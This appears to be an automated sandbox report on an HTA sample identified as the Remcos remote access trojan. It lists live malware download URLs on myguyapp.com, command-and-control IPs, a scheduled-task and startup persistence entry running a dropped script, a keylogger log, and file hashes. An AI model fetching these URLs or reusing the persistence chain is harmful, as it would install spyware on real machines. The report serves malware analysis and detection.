DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	121 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\677826\Prostores.com	0%	ReversingLabs

Source	Detection	Scanner	Label
https://myguyapp.com/c2.batM	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=TTCBKWZUSERDOMAIN_ROAMINGP	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdf.	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdfl~e	0%	Avira URL Cloud	safe
https://myguyapp.cX	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zip	100%	Avira URL Cloud	malware
https://myguyapp.com0	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdf	0%	Avira URL Cloud	safe
https://myguyapp.com/6D	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.bata	0%	Avira URL Cloud	safe
https://myguyapp.com/MD	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.z	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdfUSERDOMA	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdfUSERDOMAIN=TTCBKWZUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPRO	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.bat	100%	Avira URL Cloud	malware
https://myguyapp.com/msword.zipF	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.batEK	0%	Avira URL Cloud	safe
https://myguyapp.com/W2	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.batEH	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
https://myguyapp.com/W2.pdf.	msword.exe, 0000000F.00000002.1999832718.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zip	mshta.exe, 00000000.00000003.1984704836.000000000A42A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986859763.000000000A9D0000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.2000214763.0000000002300000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1999832718.000000000074E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1999815471.0000000000730000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2022501702.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2022018394.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2022607509.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2022123246.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.2022446561.0000000002D20000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2027408299.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2027282495.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028472272.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028417188.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028054246.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2084148337.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2084304849.00000000034D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2038437182.0000000002650000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2038464113.000000000267B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2040494618.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2040183078.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.7.dr	false		high
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=TTCBKWZUSERDOMAIN_ROAMINGP	cmd.exe, 00000021.00000002.2040183078.0000000002DB0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/W2.pdfl~e	tasklist.exe, 00000017.00000003.2027408299.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000003.2027282495.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028472272.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.cX	cmd.exe, 00000021.00000002.2040261379.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.batM	mshta.exe, 00000000.00000003.1986911555.000000000A4A7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com0	mshta.exe, 00000000.00000003.1987593680.000000000A3EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1990980601.000000000A3EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984704836.000000000A3E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/W2.pdf	tasklist.exe, 00000017.00000002.2028417188.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000017.00000002.2028054246.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2084148337.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001D.00000002.2084304849.00000000034D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2038437182.0000000002650000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.2038464113.000000000267B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2040494618.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2040183078.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp, c2[1].bat.0.dr	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/6D	mshta.exe, 00000000.00000003.1984218231.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984631403.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984345396.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986530276.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1989049206.00000000031C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.bata	mshta.exe, 00000000.00000002.1988431271.000000000310E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.z	msword.exe, 0000000F.00000003.1999229661.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1999832718.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/MD	mshta.exe, 00000000.00000003.1984218231.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984631403.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984345396.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986530276.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1989049206.00000000031C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/X	Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000000.2031404136.0000000000345000.00000002.00000001.01000000.0000000F.sdmp, CineBlend.scr, 00000024.00000000.2043279107.0000000000C05000.00000002.00000001.01000000.00000011.sdmp, CineBlend.scr, 00000026.00000002.2207796364.00000000006A5000.00000002.00000001.01000000.00000011.sdmp, Prostores.com.19.dr, Metallic.15.dr, CineBlend.scr.28.dr	false		high
https://myguyapp.com/W2.pdfUSERDOMA	msword.exe, 0000000F.00000003.1999229661.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1999832718.00000000007C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/W2.pdfUSERDOMAIN=TTCBKWZUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPRO	cmd.exe, 00000021.00000002.2040261379.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	msword.exe, 0000000F.00000000.1983404976.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.12.dr	false		high
https://myguyapp.com/W2	tasklist.exe, 00000015.00000002.2022551965.0000000002DCC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2021952305.0000000002DBF000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.2022018394.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipF	msword.exe, 0000000F.00000002.1999832718.000000000074E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Prostores.com, 0000001C.00000003.2038016379.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 0000001C.00000003.2340082719.0000000001EA6000.00000004.00000020.00020000.00000000.sdmp, Presidential.15.dr, Prostores.com.19.dr, CineBlend.scr.28.dr	false		high
https://myguyapp.com/c2.bat	mshta.exe, 00000000.00000002.1987968160.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1988750902.000000000316F000.00000004.00000020.00020000.00000000.sdmp, c2.hta	false	Avira URL Cloud: malware	unknown
https://myguyapp.com/c2.batEK	mshta.exe, 00000000.00000003.1984218231.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984631403.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984345396.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986530276.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1989049206.00000000031C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.batEH	mshta.exe, 00000000.00000003.1984218231.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984631403.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1984345396.00000000031C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1986530276.00000000031C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1989049206.00000000031C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
178.237.33.50	unknown	Netherlands		8455	ATOM86-ASATOM86NL	false
193.26.115.39	unknown	Netherlands		46261	QUICKPACKETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584279
Start date and time:	2025-01-05 03:02:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	c2.hta
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winHTA@68/101@0/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 98% Number of executed functions: 75 Number of non-executed functions: 311
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.56.252.213, 2.16.168.105, 2.16.168.107, 162.159.61.3, 172.64.41.3, 34.237.241.83, 54.224.241.105, 18.213.11.84, 50.16.47.176, 23.209.209.135, 199.232.214.172, 2.19.126.149, 2.19.126.143, 23.200.0.133, 23.200.0.147, 192.168.2.4, 23.56.254.164, 3.233.129.217, 23.56.162.204, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Execution Graph export aborted for target mshta.exe, PID 1236 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:03:35	Task Scheduler	Run new task: Troubleshooting path: wscript s>//B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
02:03:40	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url
21:02:55	API Interceptor	10x Sleep call for process: mshta.exe modified
21:02:55	API Interceptor	86x Sleep call for process: powershell.exe modified
21:03:07	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
21:03:30	API Interceptor	1x Sleep call for process: msword.exe modified
21:04:39	API Interceptor	57x Sleep call for process: Prostores.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
178.237.33.50	c2.hta	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	2LDJIyMl2r.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1evAkYZpwDV0N4v.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	94e.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	94e.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
193.26.115.39	c2.hta	Get hash	malicious	Remcos	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATOM86-ASATOM86NL	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	2LDJIyMl2r.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1evAkYZpwDV0N4v.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	94e.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	94e.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
QUICKPACKETUS	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	Dd5DwDCHJD.exe	Get hash	malicious	Quasar	Browse	193.31.28.181
	3e88PGFfkf.exe	Get hash	malicious	DCRat	Browse	185.230.138.58
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.22.235.170
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	198.22.243.54
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	172.98.171.129
	surfex.exe	Get hash	malicious	RedLine	Browse	185.218.125.157
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	armv5l.elf	Get hash	malicious	Mirai	Browse	23.133.3.186
	elitebotnet.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	23.133.3.168

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	c2.hta	Get hash	malicious	Remcos	Browse
	RisingStrip.exe	Get hash	malicious	Vidar	Browse
	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse
	over.ps1	Get hash	malicious	Vidar	Browse
	MatAugust.exe	Get hash	malicious	Vidar	Browse
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse
	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse
	AquaPac.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	3.3544524354439966
Encrypted:	false
SSDEEP:	3:rglsrkfplfwFi5JWRal2Jl+7R0DAlBG45klovDl6v:MlsIf0c5YcIeeDAlOWAv
MD5:	87F99ABFAF75B6060BB42B4905F2F860
SHA1:	371AF71F335BACA6700D87F40CE8FA1694F0DF6C
SHA-256:	F4104ADB86A64F39B72F1D1DEE620EFC725DB654A887596B9004AFE8CD105B1F
SHA-512:	C49557A628EE176C49F33F04C14FE140461F7F254D7EC4EF4182D1F896BEF61C664A426DBBBE5E4316673C8106618FDF9E75C5BDDE746A9BD951314F2C7B230A
Malicious:	true
Preview:	....[.2.0.2.5./.0.1./.0.4. .2.1.:.0.4.:.0.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.15938885657532
Encrypted:	false
SSDEEP:	6:iOvuh4q2Pwkn2nKuAl9OmbnIFUtLCJZmwhDkwOwkn2nKuAl9OmbjLJ:764vYfHAahFUtLCJ/hD5JfHAaSJ
MD5:	5960003E6A252929C5B77BDF868F612C
SHA1:	63F892B1C77DD9CB8BB5FD3AFA9D8E9B0D0408D3
SHA-256:	A27D9A5CE7C9EF458E98D1DD98198F6E74C75188F23161607A91ACEC186ADDCC
SHA-512:	8BC4B9FD495F8327DC755A5DB8EF4FC538ED3C19C01B468AC86E582EE97B3159A5370E3F075DC6B4D3A0D0069C6DBC8DD96C85512B932612F2BBB0FBD8B86547
Malicious:	false
Preview:	2025/01/04-21:03:00.083 1df4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/04-21:03:00.085 1df4 Recovering log #3.2025/01/04-21:03:00.086 1df4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.15938885657532
Encrypted:	false
SSDEEP:	6:iOvuh4q2Pwkn2nKuAl9OmbnIFUtLCJZmwhDkwOwkn2nKuAl9OmbjLJ:764vYfHAahFUtLCJ/hD5JfHAaSJ
MD5:	5960003E6A252929C5B77BDF868F612C
SHA1:	63F892B1C77DD9CB8BB5FD3AFA9D8E9B0D0408D3
SHA-256:	A27D9A5CE7C9EF458E98D1DD98198F6E74C75188F23161607A91ACEC186ADDCC
SHA-512:	8BC4B9FD495F8327DC755A5DB8EF4FC538ED3C19C01B468AC86E582EE97B3159A5370E3F075DC6B4D3A0D0069C6DBC8DD96C85512B932612F2BBB0FBD8B86547
Malicious:	false
Preview:	2025/01/04-21:03:00.083 1df4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/04-21:03:00.085 1df4 Recovering log #3.2025/01/04-21:03:00.086 1df4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.074518450699976
Encrypted:	false
SSDEEP:	6:iOqjIq2Pwkn2nKuAl9Ombzo2jMGIFUthPZmwfdkwOwkn2nKuAl9Ombzo2jMmLJ:7+IvYfHAa8uFUtB/l5JfHAa8RJ
MD5:	031156DC94DA7541126C55700529F967
SHA1:	D7824A1CDB74DC216D251A46AAD7465626E0070C
SHA-256:	C1240CB9208700F3573C430E0039CE3B52BA9A2CD1EE2872ED7128DFAC5593C8
SHA-512:	3749B765EFE89B639AAB5C73FBD73426C9CF6BE01F3A4ADD876A659C9325E9FDC5AA611F72A128E0254AE4EB169DDD625CAD983442BC48D2BDCF77D07F40F067
Malicious:	false
Preview:	2025/01/04-21:03:00.103 1eb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/04-21:03:00.104 1eb4 Recovering log #3.2025/01/04-21:03:00.104 1eb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.074518450699976
Encrypted:	false
SSDEEP:	6:iOqjIq2Pwkn2nKuAl9Ombzo2jMGIFUthPZmwfdkwOwkn2nKuAl9Ombzo2jMmLJ:7+IvYfHAa8uFUtB/l5JfHAa8RJ
MD5:	031156DC94DA7541126C55700529F967
SHA1:	D7824A1CDB74DC216D251A46AAD7465626E0070C
SHA-256:	C1240CB9208700F3573C430E0039CE3B52BA9A2CD1EE2872ED7128DFAC5593C8
SHA-512:	3749B765EFE89B639AAB5C73FBD73426C9CF6BE01F3A4ADD876A659C9325E9FDC5AA611F72A128E0254AE4EB169DDD625CAD983442BC48D2BDCF77D07F40F067
Malicious:	false
Preview:	2025/01/04-21:03:00.103 1eb4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/04-21:03:00.104 1eb4 Recovering log #3.2025/01/04-21:03:00.104 1eb4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.974792857895216
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqVUsBdOg2HiAAcaq3QYiubInP7E4T3y:Y2sRdsCZdMHig3QYhbG7nby
MD5:	601616D957664F5298321D5B7FE6C879
SHA1:	3CFF38B78933986C82035AD3F1B1D2B35AD4BA3C
SHA-256:	4C71D026449273DAFE2BBBCBA1353388804920BE935164DD7C58125A043B17EF
SHA-512:	0275E74DDDC55D135311B56B7460A731DC065965FCE822CBFC67AA2A2B317FDA804F3F89C042EEE9CFC4A25BA0536AC3617CC399229E4A8AD6EB313C11340D3D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380602591707512","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":130035},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d584b010-4338-4c3b-8053-62532ca9a404.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	475
Entropy (8bit):	4.974792857895216
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqVUsBdOg2HiAAcaq3QYiubInP7E4T3y:Y2sRdsCZdMHig3QYhbG7nby
MD5:	601616D957664F5298321D5B7FE6C879
SHA1:	3CFF38B78933986C82035AD3F1B1D2B35AD4BA3C
SHA-256:	4C71D026449273DAFE2BBBCBA1353388804920BE935164DD7C58125A043B17EF
SHA-512:	0275E74DDDC55D135311B56B7460A731DC065965FCE822CBFC67AA2A2B317FDA804F3F89C042EEE9CFC4A25BA0536AC3617CC399229E4A8AD6EB313C11340D3D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380602591707512","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":130035},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4320
Entropy (8bit):	5.249936424754642
Encrypted:	false
SSDEEP:	96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7p7e:etJCV4FiN/jTN/2r8Mta02fEhgO73go8
MD5:	146D0944423FBD7A584F8179A0D71BE7
SHA1:	D2140AB2EF91A3DD5F235928F091B4D2429D70F5
SHA-256:	458A0332EE7138CA88C55EA4AC29A2FF53BFE1BB20B8FC207015717D37486CCB
